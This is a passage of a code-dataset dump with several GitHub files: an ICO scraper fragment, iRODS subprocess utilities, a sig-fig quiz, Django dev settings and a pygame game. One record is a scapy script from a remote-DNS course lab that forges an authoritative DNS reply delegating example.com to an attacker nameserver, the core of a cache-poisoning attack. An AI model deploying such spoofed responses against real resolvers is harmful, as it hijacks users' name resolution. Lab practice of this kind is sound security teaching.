\"\"\n\t\thardcap = \"\"\n\t\tcountry = \"\"\n\t\ttokentype =\"\"\n\t\tfor item in financial_data.find_all(\"div\", \"data_row\"):\n\n\t\t\tcols = item.find_all(\"div\", \"col_2\")\n\t\t\tif \"Soft cap\" in cols[0].text:\n\t\t\t\tsoftcap = cols[1].text\n\t\t\tif \t\"Hard cap\" in cols[0].text:\n\t\t\t\thardcap = cols[1].text\n\t\t\tif \"Country\" in cols[0].text:\n\t\t\t\tcountry = cols[1].text\n\t\t\tif \"Platform\" in cols[0].text:\n\t\t\t\ttokentype = cols[1].text\n\t\ttwitter =\"\"\n\t\tif soup2.find(\"a\", \"twitter\"):\n\t\t\ttwitter = soup2.find(\"a\", \"twitter\")['href']\n\t\tslack = \"\"\n\t\tif soup2.find(\"a\", \"slack\"):\n\t\t\tslack = soup2.find(\"a\", \"slack\")['href']\n\t\twebsite = \"\"\n\t\tif soup2.find(\"a\", \"www\"):\n\t\t\twebsite = soup2.find(\"a\", \"www\")['href']\n\t\ttelegram = \"\"\n\t\tif soup2.find(\"a\", \"telegram\"):\n\t\t\ttelegram = soup2.find(\"a\", \"telegram\")['href']\n\n\t\twhitepaper =\"\"\n\t\tfor tab in soup2.find(\"div\", \"tabs\").find_all(\"a\"):\n\t\t\tif \"White paper\" in tab.text:\n\t\t\t\twhitepaper = tab['href']\n\n\t\tteam = []\n\n\t\tmembers_all = soup2.find(id = \"team\").find_all('div', 'box')\n\t\tmembers = []\n\t\tif members_all:\n\t\t\tmembers = members_all[0].find_all(\"a\")\n\t\tif len(members_all) == 2:\n\t\t\tmembers = members_all[1].find_all(\"a\")\n\n\t\tfor member in members:\n\t\t\tif \"linkedin\" in member['href']:\n\t\t\t\tteam.append(member['href'])\n\t\t\n\t\ttemp = {}\n\t\ttemp[\"name\"] = name\n\t\ttemp[\"description\"]= desc\n\t\ttemp[\"category\"]= category\n\t\ttemp[\"website\"]= website\n\t\ttemp[\"whitepaper\"]= whitepaper\n\t\ttemp[\"twitter\"]=twitter\n\t\ttemp[\"telegram\"]=telegram\n\t\ttemp[\"slack\"]= slack\n\t\ttemp[\"team\"]=team\n\t\ttemp[\"amt_raised\"]=\"\"\n\t\ttemp[\"soft_cap\"]=softcap\n\t\ttemp[\"hard_cap\"]=hardcap\n\t\ttemp[\"pre_sale_date\"]=\"\"\n\t\ttemp[\"token_sale_date\"]=date\n\t\ttemp[\"total_supply\"]=\"\"\n\t\ttemp[\"country\"] =country\n\t\ttemp[\"tokentype\"] =tokentype\n\t\tupcoming.append(temp)\n\n\treturn [], upcoming","repo_name":"kunalchaudhary23/scraper","sub_path":"icobench.py","file_name":"icobench.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74111504359","text":"from __future__ import print_function\nimport copy\nimport errno\nimport logging\nimport pprint\nimport subprocess\nimport shlex\nimport sys\nimport time\n\nfrom . import six\n\nfrom .exceptions import IrodsError, IrodsWarning\n\ndef indent(*text, **kwargs):\n if 'indentation' in kwargs:\n indentation = kwargs['indentation']\n else:\n indentation = ' '\n return '\\n'.join([''.join([indentation, '\\n{0}'.format(indentation).join(lines.splitlines())]) for lines in text])\n\ndef safe_shlex_split_for_2_6(args):\n if not isinstance(args, str) and isinstance(args, six.text_type):\n args = args.encode('ascii')\n return shlex.split(args)\n\ndef communicate_and_log(p, args, input=None):\n l = logging.getLogger(__name__)\n out, err = [(None if t is None else t.decode('utf_8')) for t in p.communicate(input=(None if input is None else input.encode('ascii')))]\n message = ['Command %s returned with code %s.' 
% (args, p.returncode)]\n if input:\n message.append('stdin:\\n%s' % indent(input))\n if out:\n message.append('stdout:\\n%s' % indent(out))\n if err:\n message.append('stderr:\\n%s' % indent(err))\n l.debug('\\n'.join(message))\n return (out, err)\n\ndef execute_command_nonblocking(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, use_unsafe_shell=False, **kwargs):\n l = logging.getLogger(__name__)\n if not use_unsafe_shell and isinstance(args, six.string_types):\n args = safe_shlex_split_for_2_6(args)\n kwargs['stdout'] = stdout\n kwargs['stderr'] = stderr\n kwargs['shell'] = use_unsafe_shell\n if 'env' in kwargs:\n kwargs_without_env = copy.copy(kwargs)\n kwargs_without_env['env'] = 'HIDDEN'\n else:\n kwargs_without_env = kwargs\n l.debug('Calling %s with options:\\n%s', args, pprint.pformat(kwargs_without_env))\n try:\n return subprocess.Popen(args, **kwargs)\n except OSError as e:\n six.reraise(IrodsError,\n IrodsError('\\n'.join([\n 'Call to open process with {0} failed:'.format(\n args),\n indent(\n 'Could not find the requested executable \\'{0}\\'; '\n 'please ensure \\'{0}\\' is installed and in the path.'.format(\n args[0]))])),\n sys.exc_info()[2])\n\ndef execute_command_timeout(args, timeout=10, **kwargs):\n p = execute_command_nonblocking(args, **kwargs)\n start_time = time.time()\n while time.time() < start_time + timeout:\n if p.poll() is not None:\n out, err = communicate_and_log(p, args)\n check_command_return(args, out, err, p.returncode, **kwargs)\n break\n time.sleep(0.3)\n else:\n try:\n if p.poll() is None:\n p.kill()\n except OSError:\n pass\n raise IrodsError('The call {0} did not complete within {1} seconds.'.format(args, timeout))\n\ndef execute_command_permissive(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, input=None, **kwargs):\n if input is not None:\n if 'stdin' in kwargs and kwargs['stdin'] != subprocess.PIPE:\n raise IrodsError('\\'input\\' option is mutually exclusive with a \\'stdin\\' '\n 'option that is not equal to \\'subprocess.PIPE\\'.')\n kwargs['stdin'] = subprocess.PIPE\n p = execute_command_nonblocking(args, stdout=stdout, stderr=stderr, **kwargs)\n out, err = communicate_and_log(p, args, input)\n return (out, err, p.returncode)\n\ndef check_command_return(args, out, err, returncode, input=None, **kwargs):\n if returncode is not None and returncode != 0:\n if 'env' in kwargs:\n kwargs_without_env = copy.copy(kwargs)\n kwargs_without_env['env'] = 'HIDDEN'\n else:\n kwargs_without_env = kwargs\n deets = [\n 'Options passed to Popen:',\n indent(*['{0}: {1}'.format(k, v) for k, v in kwargs_without_env.items()]),\n 'Return code: {0}'.format(returncode)]\n if input:\n deets.extend(['Standard input:', indent(input)])\n if out:\n deets.extend(['Standard output:', indent(out)])\n if err:\n deets.extend(['Error output:', indent(err)])\n raise IrodsError('\\n'.join([\n 'Call to open process with {0} returned an error:'.format(\n args),\n indent(*deets)]))\n\ndef execute_command(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, input=None, **kwargs):\n out, err, returncode = execute_command_permissive(args, stdout=stdout, stderr=stderr, input=input, **kwargs)\n check_command_return(args, out, err, returncode, input=input, **kwargs)\n\n return (out, err)\n","repo_name":"irods/irods","sub_path":"scripts/irods/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":417,"dataset":"github-code","pt":"18"} +{"seq_id":"33276185356","text":"import random\nfrom 
StringSigFigs import Number, MakeNumber, RoundValue, CheckAnswer\nfrom CalcsWithSigFigs import subtractValues, multiplyValues, divideValues, findDecimalPlaces\n\n# NOTE: the arithmetic helpers defined below shadow the versions imported from CalcsWithSigFigs\noperators = ['+', '-', '*', '/']\n\ndef addValues(first,second):\n    firstDP = findDecimalPlaces(first.value)\n    secondDP = findDecimalPlaces(second.value)\n    if firstDP == 0 or secondDP == 0:\n        result = str(int(round((float(first.value)+float(second.value)),0)))\n        return result\n    elif firstDP > secondDP:\n        result = str(round(float(first.value)+float(second.value),secondDP))\n        resultDP = findDecimalPlaces(result)\n        if resultDP < secondDP:\n            result += \"0\"*(secondDP-resultDP)\n    else:\n        result = str(round(float(first.value)+float(second.value),firstDP))\n        resultDP = findDecimalPlaces(result)\n        if resultDP < firstDP:\n            result += \"0\"*(firstDP-resultDP)\n    return result\n\ndef subtractValues(first,second):\n    firstDP = findDecimalPlaces(first.value)\n    secondDP = findDecimalPlaces(second.value)\n    if firstDP == 0 or secondDP == 0:\n        result = str(int(round((float(first.value)-float(second.value)),0)))\n        return result\n    elif firstDP > secondDP:\n        result = str(round(float(first.value)-float(second.value),secondDP))\n        resultDP = findDecimalPlaces(result)\n        if resultDP < secondDP:\n            result += \"0\"*(secondDP-resultDP)\n    else:\n        result = str(round(float(first.value)-float(second.value),firstDP))\n        resultDP = findDecimalPlaces(result)\n        if resultDP < firstDP:\n            result += \"0\"*(firstDP-resultDP)\n    return result\n\ndef multiplyValues(value1, value2):\n    sigFigs = min(value1.sigFigs, value2.sigFigs)\n    product = str(float(value1.value)*float(value2.value))\n    result = RoundValue(product, sigFigs)\n\n    return result\n\ndef divideValues(value1, value2):\n    sigFigs = min(value1.sigFigs, value2.sigFigs)\n    quotient = str(float(value1.value)/float(value2.value))\n    result = RoundValue(quotient, sigFigs)\n\n    return result\n\ndef sfcalcs(value1, value2, operation):\n    if operation == 0:\n        result = addValues(value1,value2)\n        answer = input(\"{0} {1} {2} = \".format(value1.value,operators[operation],value2.value))\n    # compare numerically: the values are stored as strings, so cast before comparing\n    elif operation == 1 and float(value1.value) > float(value2.value):\n        result = subtractValues(value1,value2)\n        answer = input(\"{0} {1} {2} = \".format(value1.value,operators[operation],value2.value))\n    elif operation == 1 and float(value1.value) < float(value2.value):\n        result = subtractValues(value2,value1)\n        answer = input(\"{0} {1} {2} = \".format(value2.value,operators[operation],value1.value))\n    elif operation == 2:\n        result = multiplyValues(value1,value2)\n        answer = input(\"{0} {1} {2} = \".format(value1.value,operators[operation],value2.value))\n    elif float(value1.value)/float(value2.value)<1e-4:\n        result = divideValues(value2,value1)\n        answer = input(\"{0} {1} {2} = \".format(value2.value,operators[operation],value1.value))\n    else:\n        result = divideValues(value1,value2)\n        answer = input(\"{0} {1} {2} = \".format(value1.value,operators[operation],value2.value))\n\n    if CheckAnswer(result, answer):\n        return \"Correct! :-)\"\n    else:\n        return \"Sorry, the correct answer is {0}\".format(result)\n\ndef CheckRounding(result, sigFigs):\n    if float(result)>=10 and sigFigs <= len(result):\n        if result[sigFigs-1] == \"0\" and result.find('.') == -1:\n            print(\"Rounding {0} to {1} sig figs is ambiguous. 
Changing to scientific notation...\".format(result,sigFigs))\n            return True\n    else:\n        return False\n\ndef ApplySciNotation(result):\n    if result.value[0] == \"0\":\n        for x in range(2, len(result.value)):\n            if result.value[x] != \"0\":\n                startHere = x\n                if result.sigFigs > 1:\n                    sciNot = result.value[x]+\".\"\n                else:\n                    sciNot = result.value[x]\n                break\n        for digit in range(startHere+1,len(result.value)):\n            sciNot += result.value[digit]\n        sciNot += \"x10^-{0}\".format(startHere-1)\n    elif result.value.find(\".\") >= 0:\n        decimalIndex = result.value.find(\".\")\n        sciNot = result.value[0]+\".\"\n        for x in range(1,result.sigFigs+1):\n            if result.value[x] != \".\":\n                sciNot += result.value[x]\n        sciNot += \"x10^{0}\".format(decimalIndex-1)\n    else:\n        sciNot = result.value[0]\n        if result.sigFigs > 1:\n            sciNot += \".\" \n        for x in range(1,result.sigFigs):\n            sciNot += result.value[x]\n        sciNot += \"x10^{0}\".format(len(result.value)-1)\n    return sciNot\n\nfor x in range(6):\n    operation = random.randrange(4) #Randomly select +, -, * or / using integers 0 - 3, respectively.\n    if operation <= 2: #For +, - or *, create 2 values between 0.001 and 90 with 1 - 6 sig figs.\n        value1 = Number(random.randrange(1,7),random.randrange(-3,2))\n        value2 = Number(random.randrange(1,7),random.randrange(-3,2))\n    else: #For /, create 2 values between 0.01 and 900 with 1 - 6 sig figs.\n        value1 = Number(random.randrange(1,7),random.randrange(-2,3))\n        value2 = Number(random.randrange(1,7),random.randrange(-2,3))\n\n    result = sfcalcs(value1, value2, operation)\n    print(result)\n\n#TODO - 1) Add interactive tutorial pages. Perhaps with short videos?\n#       2) Develop measurement practice (interactive).\n#       3) Create a Number class and refactor sig fig code to use it instead of separate value, sigFig & power variables.\n#       4) Ignore #3. Using the Number class did not actually streamline the code much at all.\n#       5) For the sig fig practice pages, add an option for 'See correct answer'. 
It should appear when the user submits an incorrect response.","repo_name":"jimflores5/SigFigs","sub_path":"PracticeManips.py","file_name":"PracticeManips.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3894100762","text":"#!/usr/bin/env python\n\nfrom scapy.all import *\nconf.L3socket=L3RawSocket\n\nip = IP(src=\"199.43.135.53\", dst=\"10.0.2.5\")\nudp = UDP(sport=53, dport=33333)\n\ntarget_name = \"aaaaa.example.com\"\ntarget_domain = \"example.com\"\n\nqd_sec = DNSQR(qname=target_name)\nans_sec = DNSRR(rrname=target_name, type=\"A\",\n \t\trdata=\"1.2.3.4\", ttl=259200)\nns_sec = DNSRR(rrname=target_domain, type=\"NS\",\n \t\trdata=\"ns.dnslabattacker.net\", ttl=259200)\n\ndns = DNS(id=0xAAAA, \n \tqr=1, aa=1, rd=0, \n \tqdcount=1, nscount=1, ancount=1,\n \tqd=qd_sec, ns=ns_sec, an=ans_sec) \n\nspoof_pkt = ip/udp/dns\n#send(spoof_pkt)\n\nwith open(\"response.bin\", \"wb\") as f:\n f.write(bytes(spoof_pkt))\n","repo_name":"wuyuMk7/everything","sub_path":"courses/su/cse644/Lab6_RemoteDNS/code/scapy_response.py","file_name":"scapy_response.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33589823309","text":"\"\"\"Development settings and globals.\"\"\"\n\nimport os\nfrom os.path import join, normpath, dirname\nfrom common import *\n\n########## SECRET CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\nSECRET_KEY = r\"development+secret\"\n########## END SECRET CONFIGURATION\n\n########## DEBUG CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n########## END DEBUG CONFIGURATION\n\n########## ALLOWED HOSTS\nALLOWED_HOSTS = ['localhost']\n########## END ALLOWED HOSTS\n\n\n########## EMAIL CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n########## END EMAIL CONFIGURATION\n\n\n########## DATABASE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nif 'DATABASE_URL' not in os.environ:\n db_dir = join(dirname(PROJECT_ROOT), 'database')\n os.environ['DATABASE_URL'] = 'sqlite:///' + db_dir + '/project.db'\n\nimport dj_database_url\nDATABASES = {\n 'default':\n dj_database_url.config()\n}\n########## END DATABASE CONFIGURATION\n","repo_name":"creimers/djangocms_scaffold","sub_path":"src/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32092956576","text":"import pygame, sys\nfrom pygame.locals import *\nfrom pygame import mixer\n\nmixer.init()\n\npygame.init()\n\nglobal greenhouse_effect\ngreenhouse_effect = 50\n\ndef collision_test(rect, tiles):\n hit_list = []\n for tile in tiles:\n if rect.colliderect(tile):\n hit_list.append(tile)\n\n return hit_list\n\ndef collisions_testing(player_rect, obj_list, greenhouse_effect):\n counter = -1\n obj_list_copy = obj_list[:]\n for i in range(len(obj_list_copy)-1):\n counter += 1\n if player_rect.colliderect(obj_list[i][0]):\n del obj_list[i]\n greenhouse_effect -= 5\n collect.set_volume(0.3)\n collect.play()\n\n return greenhouse_effect\n\ndef move(rect, movement, tiles):\n collision_types = 
{'top':False,'bottom':False,'right':False,'left':False}\n \n rect.x += movement[0]\n hit_list = collision_test(rect, tiles)\n for tile in hit_list:\n if movement[0] > 0:\n rect.right = tile.left\n collision_types['right'] = True\n elif movement[0] < 0:\n rect.left = tile.right\n collision_types['left'] = True\n \n rect.y += movement[1]\n hit_list = collision_test(rect,tiles)\n for tile in hit_list:\n if movement[1] > 0:\n rect.bottom = tile.top\n collision_types['bottom'] = True\n elif movement[1] < 0:\n rect.top = tile.bottom\n collision_types['top'] = True\n return rect, collision_types\n\ndef show_health(health):\n font = pygame.font.Font(\"freesansbold.ttf\", 15)\n colour = \"darkgreen\"\n if health < 50:\n colour = \"darkgreen\"\n if health > 50 and health < 76:\n colour = \"orange\"\n if health > 75:\n colour = \"red\"\n scoreSurf = font.render(\"Greenhouse Effect: %s percent\"%(health),True,colour)\n scoreRect = scoreSurf.get_rect()\n scoreRect.topleft = (10,10)\n display.blit(scoreSurf,scoreRect)\n\ndef showVictoryScreen():\n gameOverFont = pygame.font.Font('freesansbold.ttf', 150)\n gameSurf = gameOverFont.render('YOU', True, \"purple\")\n overSurf = gameOverFont.render('WON!', True, \"red\")\n gameRect = gameSurf.get_rect()\n overRect = overSurf.get_rect()\n gameRect.midtop = (700 / 2, 370 / 2 - 150)\n overRect.midtop = (700 / 2, 370 / 2)\n\n screen.blit(gameSurf, gameRect)\n screen.blit(overSurf, overRect)\n\n win_sound.play()\n\n pygame.display.update()\n pygame.time.wait(5000)\n\ndef showGameOverScreen():\n gameOverFont = pygame.font.Font('freesansbold.ttf', 150)\n gameSurf = gameOverFont.render('Game', True, \"purple\")\n overSurf = gameOverFont.render('Over', True, \"red\")\n gameRect = gameSurf.get_rect()\n overRect = overSurf.get_rect()\n gameRect.midtop = (700 / 2, 370 / 2 - 150)\n overRect.midtop = (700 / 2, 370 / 2)\n\n screen.blit(gameSurf, gameRect)\n screen.blit(overSurf, overRect)\n\n death_sound.play()\n\n pygame.display.update()\n pygame.time.wait(5000)\n \n\n\nWINDOW_SIZE = [700, 370]\n\nglobal clock\nclock = pygame.time.Clock()\n\nair_timer = 0\n\ntimer = 50\ngreenhouse_counter = 0\n\nscreen = pygame.display.set_mode(WINDOW_SIZE)\nglobal display\ndisplay = pygame.Surface((350, 185))\n\nrun = True\n\nplayer_gravity = 0\n\ntrue_scroll = [0,0]\n\nbackground_objects = [[0.25,[120,10,70,400]],[0.25,[280,30,40,400]],[0.5,[30,40,40,400]],[0.5,[130,90,100,400]],[0.5,[300,80,120,400]],[0.25,[420,50,120,200]],[0.5,[500,50,50,400]]]\n\nmoving_right = False\nmoving_left = False\n\ngrass_img = pygame.image.load(\"images/grass.png\")\ngrass_img = pygame.transform.scale(grass_img, (10,10))\n\ndirt_img = pygame.image.load(\"images/dirt.png\")\ndirt_img = pygame.transform.scale(dirt_img, (10,10))\n\nplayer_flip = False\n\nglobal death_sound, win_sound, collect\ndeath_sound = pygame.mixer.Sound(\"gameover.wav\")\nwin_sound = pygame.mixer.Sound(\"victory.wav\")\ncollect = pygame.mixer.Sound(\"score.wav\")\n\ngame_map = [[0,0,0,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,40,1,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,2,2,1,1,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,0,0,0,0],\n [0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,2,2,0,0,0,0,0,20,0,0,40,0,0,0,0,0,0,20,0,0,0,0,0,0,0,0,0,0,0,2,2,2,2,2,1,1,1,0,0,0,0],\n 
[0,0,0,0,0,0,0,2,2,2,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,2,2,0,0,0,0,0,0,0,0,0,0,0,2,2,2,2,0,0,0,2,1,1,1,1,1,1,1,1,2,2,2,2],\n [60,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\n [2,2,0,0,0,0,0,0,30,0,0,0,0,0,0,0,0,2,2,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,2,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\n [1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,0,0,0,0,2,2,1,1,2,2,0,0,40,0,0,0,2,2,2,1,2,2,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,2,2,0,0,0,0],\n [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,20,0,1,1,1,1,1,0,0,0,0,0,0,2,1,1,1,1,1,1,0,0,0,0,0,2,2,2,0,2,2,2,2,2,2,2,2,2,2,1,1,0,0,0,0],\n [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,0,0,0,0,2,2,2,2,1,1,1,1,1,1,1,0,60,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0],\n [0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,2,2,2,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,2,2,2,2],\n [0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,0,0,0,0,0,1,60,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0],\n [0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,2,2,2,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0]]\n\nframe_number = 0\nanimated_num = 1\nanimation_type = \"run\"\n\nplayer_img = pygame.image.load('images/RUN_1.png')\nplayer_img = pygame.transform.scale(player_img, (12, 17))\nplayer_rect = pygame.Rect(0, 0, player_img.get_width(), player_img.get_height())\n\nobj_list = []\ny = 0\nfor row in game_map:\n x = 0\n for tile in row:\n if tile == 10:\n image = pygame.image.load(\"trash_images/t1.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t1\"])\n if tile == 20:\n image = pygame.image.load(\"trash_images/t2.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t2\"])\n if tile == 30:\n image = pygame.image.load(\"trash_images/t3.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t3\"])\n if tile == 40 or tile == 50:\n image = pygame.image.load(\"trash_images/t4.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t4\"])\n if tile == 60:\n image = pygame.image.load(\"trash_images/t1.png\")\n image.set_colorkey((255,255,255))\n image = pygame.transform.scale(image, (15,15))\n image_rect = pygame.Rect(x * 15, y * 10, 15, 15)\n obj_list.append([image_rect, image, [x * 15, y * 10, 15, 15], \"t1\"])\n x += 1\n y += 1\n\ntime_remaining = 30\ntimer = pygame.USEREVENT\npygame.time.set_timer(timer, 3000)\n\nwin = False\ngame_over = False\n\ndef start_screen():\n run = True\n pygame.mixer.music.load(\"home_screen_bg.mp3\")\n pygame.mixer.music.play(-1)\n show_controls = False\n count = 0\n while run:\n\n clock.tick(60)\n \n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n run = False\n if event.type ==QUIT:\n run = False\n if event.type == MOUSEBUTTONUP:\n x, y = pygame.mouse.get_pos()\n if x >= 250 and x <= 
450:\n if y >= (370 / 2 + 120 - 75/2) and y <= (370 / 2 + 120 + 75/2):\n run = False\n if x >= 0 and x <= 150:\n if y >= 50 and y <= 125:\n if count == 1:\n count = 0\n show_controls = False\n elif count == 0:\n count = 1\n show_controls = True\n\n screen.fill(\"black\")\n intro_1 = \"You are a Climate Warrior who has to collect as many\"\n intro_2 = \"items in order to bring down the Greenhouse Effect to zero.\"\n intro_3 = \"The greenhouse effect is ever-increasing due to\"\n intro_4 = \"incessant land pollution by humans.\"\n\n \n titleFont = pygame.font.Font(\"freesansbold.ttf\",80)\n title = titleFont.render(\"CLIMATE\", True, \"white\")\n title1 = titleFont.render(\"WARRIOR\", True, \"white\")\n title_rect = title.get_rect()\n title_rect1 = title1.get_rect()\n title_rect.center = (700/2, 370 / 2 - 120)\n title_rect1.center = (700/2, 370 / 2 - 45)\n\n titleFont = pygame.font.Font(\"freesansbold.ttf\", 40)\n play = titleFont.render(\"PLAY\", True, \"white\")\n titleFont = pygame.font.Font(\"freesansbold.ttf\", 25)\n c = titleFont.render(\"Controls\", True, \"white\")\n\n titleFont = pygame.font.Font(\"freesansbold.ttf\",17)\n titleSurf1 = titleFont.render(intro_1, True, \"yellow\")\n titleSurf2 = titleFont.render(intro_2, True, \"yellow\")\n titleSurf3 = titleFont.render(intro_3, True, \"yellow\")\n titleSurf4 = titleFont.render(intro_4, True, \"yellow\")\n \n controls1 = titleFont.render(\"W/Space-bar to Jump\", True, \"green\")\n controls2 = titleFont.render(\"A to Run Left\", True, \"green\")\n controls3 = titleFont.render(\"D to Run Right\", True, \"green\")\n Rect1 = titleSurf1.get_rect()\n Rect2 = titleSurf2.get_rect()\n Rect3 = titleSurf3.get_rect()\n Rect4 = titleSurf4.get_rect()\n play_rect = play.get_rect()\n c_rect = c.get_rect()\n \n control_rect1 = controls1.get_rect()\n control_rect2 = controls2.get_rect()\n control_rect3 = controls3.get_rect()\n Rect1.center = (700 / 2, 370 / 2 +20)\n Rect2.center = (700 / 2, 370 / 2 +40)\n Rect3.center = (700 / 2, 370 / 2 + 60)\n Rect4.center = (700 / 2, 370 / 2 + 80)\n play_rect.center = (700 / 2, 370 / 2 +135)\n\n button = pygame.Rect(700 / 2, 370 / 2 + 120, 200, 75)\n button.center = (700 / 2, 370 / 2 + 135)\n button2 = pygame.Rect(700 / 2, 370 / 2 + 120, 175, 50)\n button2.center = (700 / 2, 370 / 2 + 135)\n\n button3 = pygame.Rect(700 / 2, 370 / 2 + 120, 150, 75)\n button3.center = (75, 50)\n button4 = pygame.Rect(700 / 2, 370 / 2 + 120, 125, 50)\n button4.center = (75, 50)\n c_rect.center = (75, 50)\n\n control_rect1.topleft = (10, 370 / 2 + 100)\n control_rect2.topleft = (10, 370 / 2 + 120)\n control_rect3.topleft = (10, 370 / 2 + 140)\n screen.blit(title, title_rect)\n screen.blit(title1, title_rect1)\n screen.blit(titleSurf1, Rect1)\n screen.blit(titleSurf2, Rect2)\n screen.blit(titleSurf3, Rect3)\n screen.blit(titleSurf4, Rect4)\n\n if show_controls == True:\n screen.blit(controls1, control_rect1)\n screen.blit(controls2, control_rect2)\n screen.blit(controls3, control_rect3)\n\n pygame.draw.rect(screen, (20, 61, 89), button)\n pygame.draw.rect(screen, (255, 186, 68), button2)\n screen.blit(play, play_rect)\n\n pygame.draw.rect(screen, (20, 61, 89), button3)\n pygame.draw.rect(screen, (255, 186, 68), button4)\n screen.blit(c, c_rect)\n \n pygame.display.update()\n \n clock.tick(60)\n \n pygame.mixer.music.fadeout(200)\n \n\nstart_screen()\n\npygame.mixer.music.load(\"game_bg.wav\")\npygame.mixer.music.play(-1)\n\nwhile run:\n if greenhouse_effect <= 0:\n win = True\n if greenhouse_effect >= 100 or player_rect.y > 150:\n 
game_over = True\n \n if game_over == True:\n pygame.mixer.music.fadeout(500)\n showGameOverScreen()\n pygame.quit()\n if win == True:\n pygame.mixer.music.fadeout(500)\n showVictoryScreen()\n pygame.quit()\n\n frame_number += 1\n if frame_number == 5:\n animated_num += 1\n player_img = pygame.image.load('images/RUN_' + str(animated_num) + '.png')\n if animated_num == 2 or animated_num == 5:\n player_img = pygame.transform.scale(player_img, (8,17))\n else:\n player_img = pygame.transform.scale(player_img, (12,17))\n player_rect = pygame.Rect(player_rect.x, player_rect.y, player_img.get_width(), player_img.get_height())\n frame_number = 0\n if animated_num == 6:\n animated_num = 0\n \n display.fill((146, 244, 255))\n \n tile_Rects = []\n\n true_scroll[0] += (player_rect.x - true_scroll[0] - 150) / 20\n true_scroll[1] += (player_rect.y - true_scroll[1] - 92) / 20\n scroll = true_scroll.copy()\n scroll[0] = int(true_scroll[0])\n scroll[1] = int(true_scroll[1])\n\n pygame.draw.rect(display,(7,80,75),pygame.Rect(0,120,500,80))\n for bg_obj in background_objects:\n obj_rect = pygame.Rect(bg_obj[1][0] - scroll[0] * bg_obj[0], bg_obj[1][1] - scroll[1] * bg_obj[0], bg_obj[1][2], bg_obj[1][3])\n if bg_obj[0] == 0.5:\n pygame.draw.rect(display, (14, 222, 150), obj_rect)\n else:\n pygame.draw.rect(display, (2, 54, 2), obj_rect)\n \n show_health(greenhouse_effect)\n \n y = 0\n for row in 